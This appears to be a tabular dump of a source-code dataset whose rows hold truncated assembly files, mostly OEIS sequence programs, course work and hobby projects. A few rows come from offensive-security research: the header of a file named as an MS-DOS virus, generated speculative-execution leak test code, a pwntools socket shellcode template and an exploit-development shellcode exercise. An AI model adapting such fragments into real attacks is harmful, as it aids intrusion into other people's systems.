max_stars_repo_path stringlengths 3 255 | max_stars_repo_name stringlengths 5 116 | max_stars_count int64 0 107k | id stringlengths 1 7 | content stringlengths 63 1.05M |
|---|---|---|---|---|
Transynther/x86/_processed/US/_zr_/i7-8650U_0xd2_notsx.log_124_158.asm | ljhsiun2/medusa | 9 | 203580 | <filename>Transynther/x86/_processed/US/_zr_/i7-8650U_0xd2_notsx.log_124_158.asm
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r14
push %r9
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0xfba, %rsi
lea addresses_A_ht+0x1833a, %rdi
add %r11, %r11
mov $85, %rcx
rep movsb
and %rd... |
CS218/summer17/Assignment01/ast01.asm | 3SUM/monalisa | 5 | 203581 | ; Must include:
; <NAME>
; assignment 01
; section <1002>
; No name, asst, section -> no points!
; *****************************************************************
; Data Declarations
; Note, all data is declared statically (for now).
section .data
; -----
; Standard constants.
TRUE equ 1
FALSE equ 0
EX... |
programs/oeis/055/A055260.asm | neoneye/loda | 22 | 203582 | <reponame>neoneye/loda<gh_stars>10-100
; A055260: Sums of two powers of 9.
; 2,10,18,82,90,162,730,738,810,1458,6562,6570,6642,7290,13122,59050,59058,59130,59778,65610,118098,531442,531450,531522,532170,538002,590490,1062882,4782970,4782978,4783050,4783698,4789530,4842018,5314410,9565938,43046722,43046730,43046802,4304... |
oeis/037/A037712.asm | neoneye/loda-programs | 11 | 203583 | <gh_stars>10-100
; A037712: Base-7 digits are, in order, the first n terms of the periodic sequence with initial period 1,3,2,0.
; Submitted by <NAME>(s1.)
; 1,10,72,504,3529,24706,172944,1210608,8474257,59319802,415238616,2906670312,20346692185,142426845298,996987917088,6978915419616,48852407937313,341966855561194,239... |
programs/oeis/201/A201975.asm | jmorken/loda | 1 | 203584 | <reponame>jmorken/loda
; A201975: Number of n X 2 0..3 arrays with rows and columns lexicographically nondecreasing read forwards and nonincreasing read backwards.
; 4,30,72,131,208,304,420,557,716,898,1104,1335,1592,1876,2188,2529,2900,3302,3736,4203,4704,5240,5812,6421,7068,7754,8480,9247,10056,10908,11804,12745,1373... |
expression.asm | CristinaNilvan/assembler-i386-algorithmic-problems | 1 | 203585 | .386
.model flat, stdcall
includelib msvcrt.lib
extern exit: proc
public start
.data
final_value dd 0
n dd 3
numbers dd 1, 2, 3
value_to_add dd 0, 0, 0
.code
expression macro esi
finit
fild numbers[esi]
fsqrt
fst value_to_add[esi]
finit
fld value_to_add[e... |
include/platform.asm | siraben/ti84th-os | 2 | 203587 | #ifdef TI84p
#define CPU15
#define CRYSTAL_TIMERS
#define LINK_ASSIST
#define MD5_ACCELERATION
#define USB
#define CLOCK
.equ PRIVILEGED_PAGE 0x3C
.equ BOOT_PAGE 0x3F
#endif
.macro lcdout(reg, value)
ld a, reg
ld hl, value
call writeLcdRegister
.endmacro
.macro SET_BANK_A
out (6), a
.endmacro
.... |
programs/oeis/081/A081168.asm | jmorken/loda | 1 | 203588 | <filename>programs/oeis/081/A081168.asm
; A081168: Differences of Beatty sequence for square root of 10.
; 3,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4,3,3,3,3,3,4
mo... |
MSDOS/Virus.MSDOS.Unknown.prospero.asm | fengjixuchui/Family | 3 | 203589 | <filename>MSDOS/Virus.MSDOS.Unknown.prospero.asm
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
;-------------------------------------------------------------------------
; Prospero Virus
;
; (C) Opic [Codebreakers 1998]
;----------------... |
pinpog.asm | KostiantynKopytov/pinpog | 0 | 203590 | <filename>pinpog.asm<gh_stars>0
org 0x7C00
%define WIDTH 320
%define HEIGHT 200
%define COLOR_BLACK 0
%define COLOR_BLUE 1
%define COLOR_GREEN 2
%define COLOR_CYAN 3
%define COLOR_RED 4
%define COLOR_MAGENTA 5
%define COLOR_BROWN 6
%define COLOR_LIGHTGRAY 7
%define COLOR_DARKGRAY 8
%define COLOR_LIGHTBLUE 9
%defin... |
chap18/ex34/double_rsqrt_50.asm | JamesType/optimization-manual | 374 | 203591 | <filename>chap18/ex34/double_rsqrt_50.asm<gh_stars>100-1000
;
; Copyright (C) 2021 by Intel Corporation
;
; Permission to use, copy, modify, and/or distribute this software for any
; purpose with or without fee is hereby granted.
;
; THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
; REGARD... |
solutions/46 - Compulsory Office Romance/size-4_speed-6.asm | behrmann/7billionhumans | 45 | 203592 | <gh_stars>10-100
-- 7 Billion Humans (2053) --
-- 46: Compulsory Office Romance --
-- Author: soerface
-- Size: 4
-- Speed: 6
if e == worker:
a:
tell everyone hi
endif
listenfor hi
jump a |
Transynther/x86/_processed/US/_ht_st_zr_un_4k_/i3-7100_9_0xca_notsx.log_21829_1392.asm | ljhsiun2/medusa | 9 | 203593 | <filename>Transynther/x86/_processed/US/_ht_st_zr_un_4k_/i3-7100_9_0xca_notsx.log_21829_1392.asm<gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r8
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_D_ht+0xbd38, %r11
dec %r13
movb (%r11), %r8b
nop
nop
nop
nop
... |
programs/oeis/200/A200872.asm | jmorken/loda | 1 | 203594 | <reponame>jmorken/loda<gh_stars>1-10
; A200872: Number of 0..n arrays x(0..3) of 4 elements without any interior element greater than both neighbors or less than both neighbors.
; 10,37,94,195,356,595,932,1389,1990,2761,3730,4927,6384,8135,10216,12665,15522,18829,22630,26971,31900,37467,43724,50725,58526,67185,76762,87... |
pwnlib/shellcraft/templates/i386/linux/socket.asm | DrKeineLust/pwntools | 8,966 | 203595 | <% from pwnlib.shellcraft.i386.linux import socketcall %>
<% from pwnlib.constants import AF_INET, AF_INET6, SOCK_STREAM, SOCK_DGRAM, SYS_socketcall_socket %>
<% from pwnlib.util.net import sockaddr %>
<%page args="network = 'ipv4', proto = 'tcp'"/>
<%docstring>
Creates a new socket
</%docstring>
<%
address_family ... |
libsrc/_DEVELOPMENT/sound/bit/z80/asm_bit_fx/_bitfx_26.asm | teknoplop/z88dk | 0 | 203596 |
SECTION code_clib
SECTION code_sound_bit
PUBLIC _bitfx_26
INCLUDE "clib_target_cfg.asm"
EXTERN asm_bit_beep_raw
_bitfx_26:
; fx3 effect
ld hl,30
ld de,1
fx3_1:
push de
push hl
call asm_bit_beep_raw
ld hl,600
ld de,1
call asm_bit_beep_raw
pop hl
pop de
... |
Transynther/x86/_processed/NC/_zr_/i3-7100_9_0x84_notsx.log_21829_7.asm | ljhsiun2/medusa | 9 | 203597 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r14
push %r9
push %rax
push %rdi
push %rdx
lea addresses_WT_ht+0xc682, %rax
nop
nop
nop
nop
nop
inc %rdi
mov $0x6162636465666768, %r9
movq %r9, (%rax)
and $51413, %rdx
lea addresses_UC_ht+0x59fa, %r10
cmp $36017, %r14
movb (%r10), %r12b
add $41374, ... |
data/mapHeaders/viridiangym.asm | adhi-thirumala/EvoYellow | 16 | 203599 | ViridianGym_h:
db GYM ; tileset
db VIRIDIAN_GYM_HEIGHT, VIRIDIAN_GYM_WIDTH ; dimensions (y, x)
dw ViridianGymBlocks, ViridianGymTextPointers, ViridianGymScript ; blocks, texts, scripts
db $00 ; connections
dw ViridianGymObject ; objects
|
programs/oeis/266/A266664.asm | jmorken/loda | 1 | 203600 | <filename>programs/oeis/266/A266664.asm
; A266664: Number of OFF (white) cells in the n-th iteration of the "Rule 47" elementary cellular automaton starting with a single ON (black) cell.
; 0,1,3,2,7,2,11,2,15,2,19,2,23,2,27,2,31,2,35,2,39,2,43,2,47,2,51,2,55,2,59,2,63,2,67,2,71,2,75,2,79,2,83,2,87,2,91,2,95,2,99,2,103... |
ltst2.asm | adrianna157/CS444-Lab5-Mutexes | 0 | 203601 | <filename>ltst2.asm
_ltst2: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
#endif // BENNY_MOOTEX
int
main(int argc, char **argv)
{
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 53 push %ebx
4: 83 e4 f0 an... |
U9200/CardFiles/Source/punch_test.asm | sboydlns/univacemulators | 2 | 203602 | ***********************************************************
*
* Card punch tester
*
***********************************************************
CPTS START 0
USING *,0
EXTRN READ Reader I/O entry point
EXTRN PUNC
ENTRY RBUF ... |
oeis/164/A164021.asm | neoneye/loda-programs | 11 | 203604 | ; A164021: a(n) = 12*a(n-1) - 34*a(n-2) for n > 1; a(0) = 3, a(1) = 22.
; Submitted by <NAME>
; 3,22,162,1196,8844,65464,484872,3592688,26626608,197367904,1463110176,10846813376,80416014528,596200519552,4420261740672,32772323223296,242978979496704,1801488764368384,13356579869532672,99028340445867008,734216369786293248,... |
Transynther/x86/_processed/AVXALIGN/_st_/i7-8650U_0xd2_notsx.log_21829_735.asm | ljhsiun2/medusa | 9 | 203605 | <filename>Transynther/x86/_processed/AVXALIGN/_st_/i7-8650U_0xd2_notsx.log_21829_735.asm
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r14
push %r15
push %r8
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0xa403, %r12
nop
inc %rbp
movb $0x61, (%r12)
nop
cmp %r8, %r8
lea addresses_UC... |
challenge3/shellcode.asm | aitumik/exploitdev | 17 | 203606 | <reponame>aitumik/exploitdev<filename>challenge3/shellcode.asm
section .data
msg db 'Hi there',0xa
section .text
global _start
_start:
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov al, 0x4
mov bl, 0x1
mov ecx, msg
mov dl, 0x8
int 0x80
mov al, 0x1
xor ebx,ebx
int 0x80
|
programs/oeis/207/A207106.asm | karttu/loda | 0 | 203609 | ; A207106: Number of n X 3 0..1 arrays avoiding 0 0 0 and 0 1 1 horizontally and 0 0 1 and 1 1 0 vertically.
; 6,36,98,200,350,556,826,1168,1590,2100,2706,3416,4238,5180,6250,7456,8806,10308,11970,13800,15806,17996,20378,22960,25750,28756,31986,35448,39150,43100,47306,51776,56518,61540,66850,72456,78366,84588,91130,980... |
target/cos_117/disasm/iop_overlay1/XFRMT.asm | jrrk2/cray-sim | 49 | 203610 | <reponame>jrrk2/cray-sim
0x0000 (0x000000) 0x2119- f:00020 d: 281 | A = OR[281]
0x0001 (0x000002) 0x2925- f:00024 d: 293 | OR[293] = A
0x0002 (0x000004) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x0003 (0x000006) 0x2929- f:00024 d: 297 | OR[297... |
tp1/sqr sum.asm | hogoww/compil | 0 | 203611 | <gh_stars>0
#sqr & sum
.text
main:
#get first value
li $v0, 5
syscall
move $t0, $v0
#get second value
li $v0, 5
syscall
move $t1, $v0
jal sum
#affichage verif
li $v0,1
move $a0, $t2
syscall
li $v0, 10
syscall
sum:
#keep from where you're comming from
move $t8, $ra
#first mul
move $a0, $t0
... |
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_3092.asm | ljhsiun2/medusa | 9 | 203612 | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r15
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x3fad, %rax
clflush (%rax)
nop
nop
nop
xor $5103, %r15
movl $0x61626364, (%rax)
nop
nop
nop
nop
nop
xor $17042, %rdx
lea addresses_WC_ht+0x9571, %r12
nop
and %rcx, %rcx
mov $0... |
kernel/asm/io.asm | hyfloac/Kernel | 0 | 203613 | <filename>kernel/asm/io.asm
[BITS 64]
global out8
global out16
global out32
global in8
global in16
global in32
global io_wait
out8: ; void out8(u16 port, u8 val)
mov dx, di
mov al, sil
out dx, al
ret
out16: ; void out16(u16 port, u8 val)
mov dx, di
mov ax, si
out dx, ax
ret
out32: ; ... |
oeis/073/A073743.asm | neoneye/loda-programs | 11 | 203614 | <reponame>neoneye/loda-programs
; A073743: Decimal expansion of cosh(1).
; Submitted by <NAME>
; 1,5,4,3,0,8,0,6,3,4,8,1,5,2,4,3,7,7,8,4,7,7,9,0,5,6,2,0,7,5,7,0,6,1,6,8,2,6,0,1,5,2,9,1,1,2,3,6,5,8,6,3,7,0,4,7,3,7,4,0,2,2,1,4,7,1,0,7,6,9,0,6,3,0,4,9,2,2,3,6,9,8,9,6,4,2,6,4,7,2,6,4,3,5,5,4,3,0,3,5
mov $2,1
mov $3,$0
mul... |
oeis/038/A038720.asm | neoneye/loda-programs | 11 | 203615 | <reponame>neoneye/loda-programs<gh_stars>10-100
; A038720: a(n) = (n+3)*n!/2.
; Submitted by <NAME>(s3)
; 2,5,18,84,480,3240,25200,221760,2177280,23587200,279417600,3592512000,49816166400,741015475200,11769069312000,198766503936000,3556874280960000,67224923910144000,1338096104497152000,27978373094031360000,613091306060... |
Sistemi e reti/Assembly/as2.asm | Gabri3445/EquazioneSecondoGrado | 0 | 203616 | INP
STA 100
INP
STA 101
INP
STA 102
INP
STA 103
LDA 100
LDB 102
ADD
STA 104
LDA 101
LDB 103
ADD
STA 105
LDA 104
LDB 105
MUL
OUT
HLT
|
s1/sfx-original/SndCB - Wall Smash.asm | Cancer52/flamedriver | 9 | 203617 | <reponame>Cancer52/flamedriver
SndCB_Wall_Smash_Header:
smpsHeaderStartSong 1
smpsHeaderVoice SndCB_Wall_Smash_Voices
smpsHeaderTempoSFX $01
smpsHeaderChanSFX $02
smpsHeaderSFXChannel cFM5, SndCB_Wall_Smash_FM5, $00, $00
smpsHeaderSFXChannel cPSG3, SndCB_Wall_Smash_PSG3, $00, $00
; FM5 Data
SndCB_Wall_Sm... |
assembler/test7.asm | dpolad/dlx | 1 | 203618 | #####################################
# QUICKSORT #
# #
# Implemented in DLX assembly. #
# #
# <NAME> 194675 #
# <NAME> 196046 #
# #
#####################################... |
Source/HBIOS/intrtc.asm | vipoo/RomWBW | 1 | 203619 | <reponame>vipoo/RomWBW
;
;==================================================================================================
; SYSTEM TIMER BASED CLOCK DRIVER
;==================================================================================================
;
INTRTC_BUFSIZ .EQU 6 ; SIX BYTE BUFFER (YYMMDDHHMMSS)
... |
oeis/306/A306408.asm | neoneye/loda-programs | 11 | 203621 | <reponame>neoneye/loda-programs<filename>oeis/306/A306408.asm
; A306408: a(n) = Sum_{d|n} (-1)^omega(n/d) * d.
; Submitted by <NAME>
; 1,1,2,1,4,2,6,1,5,4,10,2,12,6,8,1,16,5,18,4,12,10,22,2,19,12,14,6,28,8,30,1,20,16,24,5,36,18,24,4,40,12,42,10,20,22,46,2,41,19,32,12,52,14,40,6,36,28,58,8,60,30,30,1,48,20,66,16,44,24,7... |
data/pokemon/base_stats/sinnoh/staravia.asm | Dev727/ancientplatinum | 0 | 203622 | <filename>data/pokemon/base_stats/sinnoh/staravia.asm
db 0 ; 397 DEX NO
db 55, 75, 50, 80, 40, 40
; hp atk def spd sat sdf
db NORMAL, FLYING ; type
db 120 ; catch rate
db 113 ; base exp
db NO_ITEM, NO_ITEM ; items
db GENDER_F50 ; gender ratio
db 100 ; unknown 1
db 15 ; step cycles to hatch
db ... |
2ndSemester/Operating Systems/Lab8/With Macro Lib/Lab8ext.asm | xairaven/kpi_labs | 0 | 203623 | <reponame>xairaven/kpi_labs<gh_stars>0
; Using macro library (MyMac.mac)
title Lab8.asm ; Title of the program
.model SMALL ; Model of memory for .ехе file
.stack 100h ; Reserving memory for stack
include MyMac.mac ; IMPORTING MACROS
code segment ; Code segment :)
assume CS:code, DS:... |
data/pokemon/dex_entries/regirock.asm | AtmaBuster/pokeplat-gen2 | 6 | 203624 | db "ROCK PEAK@" ; species name
db "The same rocks"
next "that form its body"
next "have been found in"
page "different layers"
next "of ground all over"
next "the world.@"
|
programs/oeis/314/A314032.asm | karttu/loda | 0 | 203626 | ; A314032: Coordination sequence Gal.6.324.4 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; 1,5,11,15,20,26,30,36,41,45,51,56,61,67,71,76,82,86,92,97,101,107,112,117,123,127,132,138,142,148,153,157,163,168,173,179,183,188,194,198,20... |
src/spread/act/password.asm | olifink/qspread | 0 | 203627 | <filename>src/spread/act/password.asm<gh_stars>0
; Password handling 2001 <NAME>
section action
include win1_spread_keys
include win1_mac_xref
include win1_keys_wman
include win1_keys_wstatus
include win1_keys_wwork
include win1_keys_err
xdef mea_password ; action routine for main window
xdef check_passwo... |
libsrc/stdio_new/file/fclose.asm | meesokim/z88dk | 8 | 203628 | ; int __FASTCALL__ fclose(FILE *stream)
; 07.2009 aralbrec
PUBLIC fclose
PUBLIC ASMDISP_FCLOSE, LIBDISP_FCLOSE, LIBDISP2_FCLOSE
EXTERN fflush, close, stdio_free, l_jpix, stdio_descendchain
EXTERN stdio_findfilestruct, stdio_findfdstruct, stdio_error_ebadf_mc
EXTERN LIBDISP_CLOSE, LIBDISP2_CLOSE, ASMDISP_FFLUSH
INCLU... |
oeis/310/A310526.asm | neoneye/loda-programs | 11 | 203629 | ; A310526: Coordination sequence Gal.6.332.1 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; Submitted by <NAME>
; 1,4,10,16,22,28,32,38,44,50,56,60,64,70,76,82,88,92,98,104,110,116,120,124,130,136,142,148,152,158,164,170,176,180,184... |
programs/oeis/029/A029577.asm | jmorken/loda | 1 | 203630 | ; A029577: Number of permutations of an n-set containing a 10-cycle.
; 0,0,0,0,0,0,0,0,0,0,362880,3991680,47900160,622702080,8717829120,130767436800,2092278988800,35568742809600,640237370572800,12164510040883200
mov $1,$0
cal $1,142
div $1,3628800
mul $1,362880
|
libsrc/_DEVELOPMENT/adt/b_array/c/sdcc_iy/b_array_append_n_callee.asm | meesokim/z88dk | 0 | 203631 | <reponame>meesokim/z88dk
; size_t b_array_append_n_callee(b_array_t *a, size_t n, int c)
SECTION code_adt_b_array
PUBLIC _b_array_append_n_callee
_b_array_append_n_callee:
pop af
pop hl
pop de
pop bc
push af
INCLUDE "adt/b_array/z80/asm_b_array_append_n.asm"
|
non_regression/other_x86_macosx_6.o.asm | LRGH/plasmasm | 1 | 203632 | .macosx_version_min 10, 12
.section __TEXT,__text,regular,pure_instructions
.align 4, 0x90
.globl _umodiu
_umodiu:
pushl %ebp
pushl %ebx
pushl %edi
pushl %esi
subl $60, %esp
call L0000000C
L0000000C:
popl %eax
movl %eax, 28(%esp)
movl 84(%esp), %edi
movl ... |
oeis/262/A262389.asm | neoneye/loda-programs | 11 | 203633 | ; A262389: Numbers whose last digit is composite.
; Submitted by <NAME>
; 4,6,8,9,14,16,18,19,24,26,28,29,34,36,38,39,44,46,48,49,54,56,58,59,64,66,68,69,74,76,78,79,84,86,88,89,94,96,98,99,104,106,108,109,114,116,118,119,124,126,128,129,134,136,138,139,144,146,148,149
mul $0,5
mov $1,$0
bin $0,3
mod $0,2
div $1,4
sub... |
Tejas-Simulator/PIN/pin-2.14/source/tools/AlignChk/movdqa_test_ia32.asm | markoshorro/tejas_knl | 17 | 203634 | <reponame>markoshorro/tejas_knl
.386
.XMM
.model flat, c
.code
movdqa_test PROC xmm_reg_ptr:DWORD
mov eax, xmm_reg_ptr
movdqa xmm0, [eax]
movdqa xmm0, [eax+1]
RET
movdqa_test ENDP
end
|
exe5-lista.asm | joaoghost19/mips-exercises | 0 | 203635 | #################################################
# exe5 MIPS assembly #
# author: <NAME> #
#################################################
.data
.text
main:
#int a = 0;
li $t1, 0
#int b = 15;
li $t2, 15
# for(int i = 0; i<5; i++) { a+= b; }
li $t3, 0
loo... |
backup/lab05/functions_testing_stub.asm | prasantadh/w20 | 0 | 203636 | <filename>backup/lab05/functions_testing_stub.asm
.data
theArray:
.word 0 33 123 -66 332 -1 -223 453 9 45 -78
sp_sanity_check_prompt_1:
.asciiz "\nSP ENTER VALUE: "
sp_sanity_check_prompt_2:
.asciiz "\nSP EXIT VALUE: "
print_s_register_prompt:
.asciiz "\nS REGISTERS: "
convention:
.asciiz "... |
Library/Chart/CObject/cobjectAttrs.asm | steakknife/pcgeos | 504 | 203637 | <filename>Library/Chart/CObject/cobjectAttrs.asm
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE: cobjectAttrs.asm
AUTHOR: <NAME>, Oct 8, 1991
METHODS:
Name Description
---- ------... |
programs/oeis/261/A261972.asm | neoneye/loda | 22 | 203638 | ; A261972: The first of three consecutive positive integers the sum of the squares of which is equal to the sum of the squares of four consecutive positive integers.
; 25,361,5041,70225,978121,13623481,189750625,2642885281,36810643321,512706121225,7141075053841,99462344632561,1385331749802025,19295182152595801,26874721... |
FreeRTOS/Demo/RX100-RSK_GCC_e2studio/RTOSDemo/Renesas_Files/r_bsp/mcu/rx111/reset_program.asm | JVVJV/FreeRTOS | 2,603 | 203639 | <filename>FreeRTOS/Demo/RX100-RSK_GCC_e2studio/RTOSDemo/Renesas_Files/r_bsp/mcu/rx111/reset_program.asm
/***********************************************************************/
/* */
/* PROJECT NAME : RTOSDemo_GCC */
/* FILE : reset_pro... |
src/chips/YMF262.asm | sharksym/vgmplay-sharksym | 6 | 203640 | <filename>src/chips/YMF262.asm
;
; VGM YMF262 chip
;
YMF262: MACRO
super: Chip YMF262_name, Header.ymf262Clock, YMF262_Connect
; hl' = time remaining
; ix = player
; iy = reader
ProcessPort0Command: PROC
call Reader_ReadWord_IY
jp System_Return
writeRegister: equ $ - 2
ENDP
; hl' = time remaining
; ix =... |
ADL/Assemble/Delete/1/R~H~R_delete_middle.asm | MaxMorning/LinkedListVisualization | 3 | 203641 | aLine 0
sInit sTemp, {0:D}
sBge sTemp, 1, 40
aLine 1
gNew delPtr
gMove delPtr, Root
aLine 2
gBne Root, null, 3
aLine 3
Exception NOT_FOUND
aLine 5
gNewVPtr rootNext
gMoveNext rootNext, Root
gBne Root, rootNext, 4
aLine 6
gMove Root, null
Jmp 16
aLine 9
gNew rearPtr
gMove rearPtr, Root
gNewVPtr rearNext
gMoveNext ... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xca_notsx.log_21829_1349.asm | ljhsiun2/medusa | 9 | 203642 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r8
push %r9
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_D_ht+0x1deff, %r9
nop
nop
nop
nop
nop
and %r12, %r12
mov $0x6162636465666768, %r8
movq %r8, (%r9)
nop
nop
nop
dec %rcx
lea addresses_WC_ht+0x12eb9, %rsi
lea addresses_WC_ht+0xccb9, %r... |
Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xca_notsx.log_21829_1698.asm | ljhsiun2/medusa | 9 | 203643 | <reponame>ljhsiun2/medusa<filename>Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xca_notsx.log_21829_1698.asm
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %rbp
push %rsi
lea addresses_UC_ht+0x1a3e6, %r13
nop
nop
nop
nop
nop
sub %r10, %r10
vmovups (%r13), %ymm4
vextracti128 $1, %ymm4, %x... |
data/mapObjects/lab2.asm | adhi-thirumala/EvoYellow | 16 | 203644 | <reponame>adhi-thirumala/EvoYellow<gh_stars>10-100
Lab2Object:
db $17 ; border block
db $2 ; warps
db $7, $2, $2, CINNABAR_LAB_1
db $7, $3, $2, CINNABAR_LAB_1
db $0 ; signs
db $3 ; objects
object SPRITE_BLACK_HAIR_BOY_2, $3, $2, STAY, DOWN, $1 ; person
object SPRITE_OLD_PERSON, $1, $4, STAY, NONE, $2 ; perso... |
oeis/337/A337851.asm | neoneye/loda-programs | 11 | 203646 | <filename>oeis/337/A337851.asm<gh_stars>10-100
; A337851: a(n) = (2^n + 2)^n.
; 1,4,36,1000,104976,45435424,82653950016,627485170000000,19631688197463081216,2504194578379511247798784,1292628144912333835229805413376,2687153475176994340820312500000000000,22431765115399782718874449007331506546282496
mov $1,2
pow $1,$0
ad... |
CS61/cs61_labs/lab-6-Kuzame/lab06_ex3.asm | Kuzame/CS61 | 1 | 203648 | ;=================================================
; Name: <NAME>
; Email: <EMAIL>
;
; Lab: lab 6
; Lab section: 24
; TA: <NAME>
;
;=================================================
.ORIG x3000
LD R2, ptr
LD R3, size
;neutralize R1
AND R1, R1, #0
;setting up error check for char 'b'
LD R4, char... |
programs/oeis/296/A296363.asm | neoneye/loda | 22 | 203651 | <filename>programs/oeis/296/A296363.asm
; A296363: a(1)=0; for n>1, a(n) = 4*n^3 - 3*n^2 - 3*n + 4.
; 0,18,76,200,414,742,1208,1836,2650,3674,4932,6448,8246,10350,12784,15572,18738,22306,26300,30744,35662,41078,47016,53500,60554,68202,76468,85376,94950,105214,116192,127908,140386,153650,167724,182632,198398,215046,2326... |
Labs/Lab3_Baby-steps/examples/ex4.asm | CristianCotovanu/IOCLA | 0 | 203652 | <reponame>CristianCotovanu/IOCLA<filename>Labs/Lab3_Baby-steps/examples/ex4.asm<gh_stars>0
%include "io.inc"
section .text
global CMAIN
CMAIN:
mov eax, 1
mov ebx, 1
cmp eax, ebx
add ecx, 1 ; Comenteaza aceasta linie
je print
ret
print:
PRINT_UDEC 4, eax
ret
|
programs/oeis/131/A131722.asm | karttu/loda | 1 | 203653 | ; A131722: Period 6: repeat [0, 10, 10, 10, 10, 10].
; 0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10,10,10,10,10,0,10
mod $0,6
pow $2,$0
pow $1,$2
mul $1,10
|
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48_notsx.log_21829_700.asm | ljhsiun2/medusa | 9 | 203654 | <gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r8
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x12422, %rsi
lea addresses_WC_ht+0x199e0, %rdi
nop
nop
add %r13, %r13
mov $9, %rcx
rep movsb
nop
nop
nop
and $35363, %r8
lea addresses_WC_ht+0xab36, %rbx
clflush (%rbx)
no... |
programs/oeis/263/A263536.asm | neoneye/loda | 22 | 203655 | <filename>programs/oeis/263/A263536.asm<gh_stars>10-100
; A263536: Row sum of an equilateral triangle tiled with the 3,4,5 Pythagorean triple.
; 5,7,12,17,19,24,29,31,36,41,43,48,53,55,60,65,67,72,77,79,84,89,91,96,101,103,108,113,115,120,125,127,132,137,139,144,149,151,156,161,163,168,173,175,180,185,187,192,197,199,2... |
Src/Ant32/t3.asm | geoffthorpe/ant-architecture | 0 | 203656 |
.data
.word 0x1
.word 0x2
.word 0x3
.word 0x4
.text
.word 0x8001
.word 0x8002
.word 0x8003
.word 0x8004
.data
.word 0x11
.word 0x12
.word 0x13
.word 0x14
.text
.word 0x8011
.word 0x8012
.word 0x8013
.word 0x8014
|
blinky/blinky.a51 | JeremyGrosser/feather51 | 1 | 203657 | ; EFM8UB1 SFRs
WDTCN = 0x97
CKCON0 = 0x8E
SFRPAGE = 0xA7
CLKSEL = 0xA9
P3 = 0xB0
; page 0x20
REG1CN = 0xC6
P3MDOUT = 0x9C
; Interrupt vector
.area INTV (ABS)
.org 0x0000
_int_reset:
ljmp _start
.org 0x0003
_int_ex0:
reti
.org 0x000b
_int_t0:
ljmp T0_ISR
.ds 5
.are... |
16bitsum.asm | adey99/8085asmcodes | 0 | 203660 | // ADDITION OF TWO 16BIT NUMBERS SUM 16 BITS OR MORE
// Manually strore 1st 16 bit no in the memory location C050 & C051 in reverse order
// Manually store 2nd 16 bit no in the memory location C052 & C053 in reverse order
// Result is stored in C053, C054 & C055 in reverse order
LHLD C050
XCHG
LHLD C052
... |
bks/BksSetCp.asm | prokushev/FamilyAPI | 1 | 203661 | ;/*!
; @file
;
; @ingroup fapi
;
; @brief BksSetCp DOS wrapper
;
; (c) osFree Project 2018, <http://www.osFree.org>
; for licence see licence.txt in root directory, or project website
;
; This is Family API implementation for DOS, used with BIND tools
; to link required API
;
; @author <NAME> (<EMAIL>)
... |
programs/oeis/160/A160595.asm | jmorken/loda | 1 | 203662 | ; A160595: Numerator of resilience R(n) = phi(n)/(n-1), with a(1) = 1 by convention.
; 1,1,1,2,1,2,1,4,3,4,1,4,1,6,4,8,1,6,1,8,3,10,1,8,5,12,9,4,1,8,1,16,5,16,12,12,1,18,12,16,1,12,1,20,6,22,1,16,7,20,16,8,1,18,20,24,9,28,1,16,1,30,18,32,3,4,1,32,11,8,1,24,1,36,20,12,15,24,1,32,27,40,1,24,16,42,28,40,1,24,4,44,15,46,36... |
Appl/GeoCalc/Document/documentSetup.asm | steakknife/pcgeos | 504 | 203663 | <reponame>steakknife/pcgeos
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1992 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: GeoCalc
FILE: documentSetup.asm
AUTHOR: <NAME>, Aug 17, 1992
ROUTINES:
Name Description
---- -----------
R... |
